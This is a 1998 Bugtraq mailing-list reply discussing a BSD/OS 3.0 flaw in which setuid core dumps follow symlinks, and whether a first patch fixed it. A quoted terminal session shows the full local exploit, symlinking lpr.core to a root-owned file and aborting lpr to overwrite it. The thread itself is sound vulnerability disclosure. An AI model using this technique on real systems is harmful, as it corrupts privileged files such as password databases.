Bugtraq mailing list archives

Re: BSD coredumps follow symlinks

From: ariel () FIREBALL TAU AC IL (Ariel Biener)
Date: Tue, 7 Apr 1998 02:43:46 +0300


On Mon, 6 Apr 1998, Ronny Cook wrote:

lpr will dump core if there is no symlink there. Maybe you failed to
install the patch correctly?


If I recall rightly, the first patch disabled the most obvious attacks, but
allowed a core dump for a setuid program across a symbolic link *if* thefile
existed and had 600 permissions (and was owned by the appropriate user).

You recall correctly. If one was to look at the bugtraq archives, one
would find my reply to Nir's letter, on Jun 20th '97:

`002810 97/06/20 20:53 66 Re: Core file anomalies under BSDi 3.0'

From:         Ariel Biener <ariel () FIREBALL TAU AC IL>
Subject:      Re: Core file anomalies under BSDi 3.0
X-To:         Nir Soffer <scorpios () CS HUJI AC IL>

On Thu, 19 Jun 1997, Nir Soffer wrote:

[.snip.]

A.) BSDi doesn't give a damn that the euid!=ruid, so finding a setgid
program with priviliges isn't neccesary.

B.) BSDi _does_ however, check if the file exists, so it's quite
impossible to overwrite files.



Hmm, this is not my experience:

slingshot: {2} % id
uid=100(ariel) gid=20(staff) groups=20(staff), 0(wheel)
slingshot: {3} % ls -l /etc/hosts.equiv
-rw-------  1 root  wheel  0 Jun 20 22:43 /etc/hosts.equiv
slingshot: {4} % ln -s /etc/hosts.equiv lpr.core
slingshot: {5} % lpr
^Z
Suspended
slingshot: {6} % kill -ABRT %1
slingshot: {7} % fg
lpr
Abort (core dumped)
slingshot: {8} % ls -l /etc/hosts.equiv
-rw-------  1 root  wheel  167936 Jun 20 22:45 /etc/hosts.equiv
slingshot: {9} % su
Password:
Jun 20 22:46:34 slingshot su: ariel to root on /dev/ttyp0
slingshot: {1} % uname -a
BSD/OS slingshot.tau.ac.il 3.0 BSDI BSD/OS 3.0 Kernel #0: Mon Jun 16
19:51:22 IDT 1997
root () slingshot tau ac il:/usr/src/sys/compile/SLINGSHOT  i386

It wont work if the target file is *not* mode 0600 .

--Ariel


Unfortunately, certain sensitive files (such as /etc/master.passwd) fit
these conditions. Thus the later patch under 3.0, which disabled *any*
core dump across a symboliclink for *any* setuid program.


Exactly. The 1st patch didn't fix it.



--Ariel


Nir's test was only for a nonexistent file, which the earlier patch handles
correctly. Unfortunately, in doing so it opens the other security hole
which was later patched under 3.0.

              ...Ronny
--
Ronald Cook, Technical Manager - Message Handling Systems/The Message eXchange
Email: ronny () tmx com au ----- Phone: +61-2-9550-4448 ---- Fax: +61-2-9519-2551

All opinions are my own and not those of TMX unless explicitly stated otherwise.


   +---------------------------------------------------------------+
   | Ariel Biener                                                  |
   | e-mail: ariel () post tau ac il        Work ph: 03-6406086       |
   | fingerprint = 07 D1 E5 3E EF 6D E5 82 0B E9 21 D4 3C 7D 8B BC |
   +---------------------------------------------------------------+

Current thread:

Re: Geac ADVANCE library system security HOLE, (continued)
- - Re: Geac ADVANCE library system security HOLE Damian Kelly (Apr 03)
  - Announce : Nessus Alpha 1 Renaud Deraison (Apr 04)
  - mailrc and pine security holes Michal Zalewski (Apr 05)
  - ICQ Spoofer Seth McGann (Apr 05)
- Re: BSD coredumps follow symlinks Nir Soffer (Apr 02)
- Security hole in TMS/SMS standby (Apr 03)
- BSD coredumps follow symlinks Ronny Cook (Apr 02)
- Re: BSD coredumps follow symlinks Ronny Cook (Apr 05)
  - QuakeI server serious hole (yawn) Chris Evans (Apr 06)
  - The ICQ exploitation Center - www.wpi.edu/~smm/icq Seth McGann (Apr 06)
  - Re: BSD coredumps follow symlinks Ariel Biener (Apr 06)